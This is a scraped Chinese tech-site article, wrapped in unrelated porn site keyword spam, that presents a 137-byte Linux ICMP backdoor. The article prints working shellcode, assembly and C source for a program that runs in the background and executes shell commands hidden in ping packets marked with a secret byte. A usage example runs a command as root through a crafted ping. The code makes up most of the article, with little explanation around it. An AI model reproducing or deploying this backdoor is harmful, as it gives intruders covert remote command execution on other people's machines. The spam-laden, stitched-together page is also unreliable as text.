成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

學會LinuxICMP后門代碼之捷徑

企業動態
如何玩轉LinuxICMP后門代碼?是否有捷徑可走?那么下面我們就來詳細看一下關于137字節的Linux遠程ICMP后門的具體內容。

 

以下的文章主要描述的是LinuxICMP后門代碼,以下的文章主要向大家講述的是關于137字節的Linux遠程ICMP后門的詳細內容,望大家在瀏覽之后會對其有更好的了解,以下就是文章的主要內容描述。

編輯特別推薦:

 

Linux多網卡同IP段解決

 

linux系統日志不自動切分的問題

linux命令:ifconfig和route

在不少協議的應用都存在著一些后門。例如我們今天將要介紹的Linux ICMP的后門。那么下面我們就來詳細看一下關于137字節的Linux遠程ICMP后門的具體內容。使用Ping控制程序:

/*

x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

[example]

main:/home/gloomy/security/shellcode/linux/icmp# ./icmp

Size of shellcode = 137

main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost

PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)

34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms

main:/home/gloomy/security/shellcode/linux/icmp# cat out

uid=0(root) gid=0(root) groups=0(root)

main:/home/gloomy/security/shellcode/linux/icmp#

*/

#include <stdio.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netinet/in.h>

#define SECRET_CHAR "\x99"

char shell[] =

"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"

"\x43\x41\x51\xb1\x03\x51\x49\x51"

"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"

"\xcd\x80\x31\xdb\x39\xc3\x75\x55"

"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"

"\xff\x54\x54\x53\x50\x55\x52\x89"

"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"

"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"

"\xb0\x25\x01\xc5\xb0" SECRET_CHAR

"\x32\x45\xff\x75\xd5\xb0\x02\xcd"

"\x80\x31\xdb\x39\xc3\x74\x25\xeb"

"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"

"\x06\xcd\x80\x5b\x89\xd9\x88\x43"

"\x07\x80\xc1\x08\x50\x55\x51\x53"

"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"

"\xff"

"/bin/sh -c";

 

void asm_code() {

 

__asm("

 

xorl %eax,%eax

xorl %ebx,%ebx

xorl %ecx,%ecx

movb $0x66,%al

incl %ebx

incl %ecx

push %ecx

movb $0x3,%cl

push %ecx

decl %ecx

push %ecx#p#

movl %esp,%ecx

int $0x80 /* socket(); */

movl %eax,%edx

movb $0x2,%al

int $0x80 /* fork(); */

xorl %ebx,%ebx

cmpl %eax,%ebx

jne exit

endlessloop:

xorl %eax,%eax

xorl %ebx,%ebx

movb $0x10,%al

push %eax

movb $0xff,%al

push %esp

push %esp

push %ebx

push %eax

push %ebp

push %edx

movl %esp,%ecx

 

movb $0x66,%al

 

movb $0x0c,%bl

int $0x80 /* recvfrom(); */

movl %ebp,%ecx

addl %eax,%ecx

xorl %eax,%eax

movb %al,-2(%ecx)

movb $0x25,%al

addl %eax,%ebp

movb $0x99,%al /* SECRET_CHAR */

xorb -1(%ebp),%al

jnz endlessloop

movb $0x2,%al

int $0x80 /* fork(); */

xorl %ebx,%ebx

cmpl %eax,%ebx

je stack

jmp endlessloop

execve:

xorl %eax,%eax

xorl %ebx,%ebx

movb $0x2,%bl

movb $0x6,%al

int $0x80 /* close(); */

 

pop %ebx

 

movl %ebx,%ecx

movb %al,0x7(%ebx)

addb $0x8,%cl

push %eax

push %ebp

push %ecx

push %ebx

movl %esp,%ecx

cdq

movb $0xb,%al

int $0x80 /* execve(); */

exit:

xorl %eax,%eax

incl %eax

int $0x80 /* exit(); */

stack:

call execve

.string \"/bin/sh -c\"

");

}

void c_code() {

int fd;

int nb = 0;

struct sockaddr_in them;

int them_size = sizeof(struct sockaddr);

char buf[256];

char *prog[] = {"/bin/sh","-c",&buf[37],NULL};

fd = socket(2,3,1);

if (fork() > 0) exit(0);

while (1) {

while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));

buf[nb-1] = 0;

if (buf[36] == (char)SECRET_CHAR)

if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }

}

}

int main(int c,char *v[]) {

void (*i)();

i = (void (*)())shell;

fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));

i();

return 0;

那么,具體的Linux ICMP后門查看方法我們就呈現出來了。

 

 

責任編輯:佚名 來源: 比特網
相關推薦

2010-08-26 11:15:47

LinuxICMP后門

2010-09-13 14:47:58

2010-09-13 15:06:36

2010-09-13 14:57:29

2010-09-13 15:14:03

2010-08-02 14:36:52

ICMPLinux

2010-09-13 15:26:34

2013-01-03 14:49:34

BES黑莓移動安全

2020-02-14 13:10:03

iPhoneAndroid捷徑

2012-07-19 11:27:11

2024-05-31 13:18:44

2010-03-17 17:24:07

IT運維管理信息化管理北塔軟件

2011-05-07 16:36:57

2011-06-21 16:38:34

SEO

2013-12-02 10:05:36

LinuxLinus后門

2011-11-25 15:34:33

2023-01-06 08:42:02

學習訓練

2013-08-09 09:50:34

2020-11-06 00:00:00

PHP技巧后門

2019-02-19 08:45:41

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 91 视频网站 | 国产精品久久精品 | 亚洲国产午夜 | 婷婷色在线 | 午夜影晥 | 国产一区二区三区在线免费观看 | 99国产精品99久久久久久 | 国产精品福利视频 | 国产日韩一区二区三免费 | 伊人二区 | 国产精品小视频在线观看 | 色婷婷一区二区三区四区 | 色婷婷综合久久久久中文一区二区 | 在线成人 | 欧美亚洲视频 | 精品丝袜在线 | 每日在线更新av | 日韩久久精品 | 久久伊人免费视频 | 中文字幕日韩一区 | 一区欧美 | 欧美国产亚洲一区二区 | 精品国产一区二区三区性色av | www.4hu影院| 久久激情网 | 日韩尤物视频 | 亚洲视频在线观看 | 免费观看毛片 | 日韩高清三区 | 国内自拍第一页 | 国产一级电影在线 | 中文字幕在线三区 | 久久国产电影 | com.国产 | av片网 | 老头搡老女人毛片视频在线看 | www.毛片| 国产精品免费大片 | 亚洲视频免费播放 | 亚洲高清在线视频 | 欧美xxxⅹ性欧美大片 |